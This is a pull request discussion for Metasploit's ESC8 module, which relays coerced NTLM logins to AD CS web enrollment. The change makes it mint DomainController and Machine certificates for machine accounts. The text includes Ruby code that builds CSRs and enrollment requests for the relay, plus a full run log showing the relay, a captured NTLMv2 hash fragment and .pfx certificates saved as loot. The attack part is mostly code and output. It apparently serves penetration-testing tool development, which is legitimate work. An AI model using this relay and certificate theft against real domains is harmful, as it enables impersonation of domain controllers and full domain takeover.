Change behavior of esc8 'AUTO' mode to attempt to get a cert based on DC and Machine types #19856

Open
wants to merge 2 commits into master

Conversation

bwatters-r7
Contributor

@bwatters-r7 bwatters-r7 commented Feb 3, 2025

This PR fixes one thing and adds support for another in the ESC8 module's AUTO mode. Previously, AUTO mode requested a certificate based on the Computer template if the authenticating entity was a computer (name ended in $).

This changes 2 things:

  1. As it turns out, if you'd like to generate a certificate based on the Computer template, you need to request it for the Machine Template because the certificate has both a template name and a display name. Requesting the template by the DisplayName Computer fails; requesting the template name Machine succeeds.

  2. In addition to fixing that, we added an attempt to get a cert based on the DomainController certificate template. Now, when on AUTO, if a computer login is detected, we try to mint a cert based on both the Machine and DomainController templates, so that if someone coerces a login from a DC using PetitPotam, we can get the DC cert.

To do:

  • Determine what permission allows us to issue a cert based on the DomainController and Machine certificate types. To get it to work, I added all the permissions I could find, so I need to narrow that one down a bit.
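The two points above (request the Computer template by its template name Machine, and try both DomainController and Machine for a machine-account login) plus the request/ReqID flow visible in the log below, as an added example in Ruby, Metasploit's language. This is not the esc8 module's own code. Assumptions, labelled in the comments: the User branch for non-machine accounts, the display-name table entries other than Computer/Machine, the certsrv form field names (the CertAttrib field is how web enrollment selects a template), and the constructed HTML response used as sample input.

```ruby
require 'openssl'
require 'uri'

# Added example, not the Metasploit esc8 module's code.

# Display name -> template name. Only the Computer -> Machine pair is stated in
# the PR; the other rows are assumed AD CS defaults included for illustration.
TEMPLATE_NAME_FOR_DISPLAY = {
  'Computer'          => 'Machine',
  'Domain Controller' => 'DomainController',
  'User'              => 'User'
}.freeze

# Map a display name to the name the CA actually accepts; unknown names pass through.
def resolve_template(name)
  TEMPLATE_NAME_FOR_DISPLAY.fetch(name, name)
end

# Strip a DOMAIN\ prefix from an identity string.
def account_name(identity)
  identity.split('\\').last
end

# Ordered templates AUTO mode should attempt for an identity. Machine accounts
# (sAMAccountName ending in '$') get DomainController first, then Machine, so a
# coerced DC login yields the DC cert. The User branch is an assumption.
def auto_templates_for(identity)
  account_name(identity).end_with?('$') ? %w[DomainController Machine] : %w[User]
end

# Build a self-signed PEM CSR for the identity with a fresh RSA key. Subject CN
# is the account name; the template is NOT encoded in the CSR (see certsrv_form).
def build_csr(identity, key: OpenSSL::PKey::RSA.new(2048))
  req = OpenSSL::X509::Request.new
  req.version = 0
  req.subject = OpenSSL::X509::Name.new([['CN', account_name(identity)]])
  req.public_key = key
  req.sign(key, OpenSSL::Digest.new('SHA256'))
  req
end

# Form body for the certsrv web enrollment endpoint (certfnsh.asp). Field names
# are the well-known ones used by relay tooling; treat them as an assumption here.
# The template is chosen through CertAttrib=CertificateTemplate:<template name>,
# which is why requesting "Computer" fails and "Machine" succeeds.
def certsrv_form(csr_pem, template)
  URI.encode_www_form(
    'Mode'             => 'newreq',
    'CertRequest'      => csr_pem,
    'CertAttrib'       => "CertificateTemplate:#{resolve_template(template)}",
    'TargetStoreFlags' => '0',
    'SaveCert'         => 'yes'
  )
end

# On success certsrv answers with HTML linking certnew.cer?ReqID=<n>&; that
# ReqID is what the relay downloads (compare the log lines in the PR).
# Returns nil when no ReqID is present, e.g. on a denied request.
def extract_req_id(html)
  m = html.match(/certnew\.cer\?ReqID=(\d+)&/)
  m && m[1].to_i
end

# Constructed sample response, not captured from a real CA.
CONSTRUCTED_RESPONSE = <<~HTML
  <HTML><BODY>
  Certificate Issued
  <A HREF="certnew.cer?ReqID=117&Enc=b64">Download certificate</A>
  </BODY></HTML>
HTML

if __FILE__ == $PROGRAM_NAME
  identity = 'EXAMPLE\\WIN2019__4CB9$'
  auto_templates_for(identity).each do |template|
    csr = build_csr(identity)
    body = certsrv_form(csr.to_pem, template)
    puts "POST /certsrv/certfnsh.asp for #{identity} (#{body.bytesize} bytes, #{template})"
  end
  puts "ReqID from response: #{extract_req_id(CONSTRUCTED_RESPONSE).inspect}"
end
```

Keep the private key from build_csr alongside the downloaded certificate; the relay needs both to write the .pfx that later authenticates as the machine or DC.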

@bwatters-r7
Contributor Author

msf6 auxiliary(server/relay/esc8) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/relay/esc8) > 
[*] Checking endpoint on http://10.5.132.180:80/certsrv/
[*] SMB Server is running. Listening on 0.0.0.0:445
[*] Server started.
[*] New request from 10.5.132.130
I, [2025-02-03T17:04:01.974044 #13337]  INFO -- : Starting thread for connection from 10.5.132.130
I, [2025-02-03T17:04:01.994004 #13337]  INFO -- : Negotiated dialect: SMB v2.0.2
D, [2025-02-03T17:04:02.002286 #13337] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
D, [2025-02-03T17:04:02.022911 #13337] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4294686564, user_id: nil, state: :in_progress>)
I, [2025-02-03T17:04:02.024305 #13337]  INFO -- : NTLM authentication request overridden to succeed for EXAMPLE\WIN2019__4CB9$
D, [2025-02-03T17:04:02.029630 #13337] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4294686564, user_id: "EXAMPLE\\WIN2019__4CB9$", state: :valid>)
[*] Received request for EXAMPLE\WIN2019__4CB9$
[*] Relaying to next target http://10.5.132.180:80/certsrv/
D, [2025-02-03T17:04:02.036505 #13337] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4294686564, user_id: "EXAMPLE\\WIN2019__4CB9$", state: :in_progress>)
I, [2025-02-03T17:04:02.037214 #13337]  INFO -- : Relaying NTLM type 1 message to 10.5.132.180 (Always Sign: true, Sign: true, Seal: false)
D, [2025-02-03T17:04:02.046613 #13337] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4294686564, user_id: "EXAMPLE\\WIN2019__4CB9$", state: :in_progress>)
I, [2025-02-03T17:04:02.047993 #13337]  INFO -- : Relaying NTLMv2 type 3 message to http://10.5.132.180:80/certsrv/ as EXAMPLE\WIN2019__4CB9$
[+] Identity: EXAMPLE\WIN2019__4CB9$ - Successfully authenticated against relay target http://10.5.132.180:80/certsrv/
[SMB] NTLMv2-SSP Client     : 10.5.132.180
[SMB] NTLMv2-SSP Username   : EXAMPLE\WIN2019__4CB9$
[SMB] NTLMv2-SSP Hash       : WIN2019__4CB9$::EXAMPLE:232179cd29005071:afc537ffeecf203a35f2c297cdec93e2:...

[*] Mode: AUTO
[*] AUTO Mode
[*] Creating certificate request for EXAMPLE\WIN2019__4CB9$ using the DomainController template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] Certificate generated using template DomainController and EXAMPLE\WIN2019__4CB9$
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=117&
[+] Certificate for EXAMPLE\WIN2019__4CB9$ using template DomainController saved to /home/tmoose/.msf4/loot/20250203170433_default_10.5.132.180_windows.ad.cs_564029.pfx
[*] Creating certificate request for EXAMPLE\WIN2019__4CB9$ using the Machine template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] Certificate generated using template Machine and EXAMPLE\WIN2019__4CB9$
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=118&
[+] Certificate for EXAMPLE\WIN2019__4CB9$ using template Machine saved to /home/tmoose/.msf4/loot/20250203170434_default_10.5.132.180_windows.ad.cs_666629.pfx
[*] Relay tasks complete; waiting for next login attempt.
D, [2025-02-03T17:04:34.353567 #13337] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4294686564, user_id: "EXAMPLE\\WIN2019__4CB9$", state: :valid>)
[*] Received request for EXAMPLE\WIN2019__4CB9$
[*] Identity: EXAMPLE\WIN2019__4CB9$ - All targets relayed to
D, [2025-02-03T17:04:34.357908 #13337] DEBUG -- : Received TREE_CONNECT request for share: IPC$
D, [2025-02-03T17:04:34.366532 #13337] DEBUG -- : Dispatching request to do_ioctl_smb2 (session: #<Session id: 4294686564, user_id: "EXAMPLE\\WIN2019__4CB9$", state: :valid>)
D, [2025-02-03T17:04:34.367210 #13337] DEBUG -- : Received IOCTL request for share: IPC$
D, [2025-02-03T17:04:34.372550 #13337] DEBUG -- : Dispatching request to do_logoff_smb2 (session: #<Session id: 4294686564, user_id: "EXAMPLE\\WIN2019__4CB9$", state: :valid>)
D, [2025-02-03T17:04:34.376207 #13337] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
E, [2025-02-03T17:04:34.376762 #13337] ERROR -- : Failed to parse the ASN1-encoded authentication request (too long)
I, [2025-02-03T17:04:34.377231 #13337]  INFO -- : Ending thread for connection from 10.5.132.130

@bwatters-r7
Contributor Author

To get this to work, I needed to give full control over the Domain Controller template to Domain Controllers.
[screenshot]
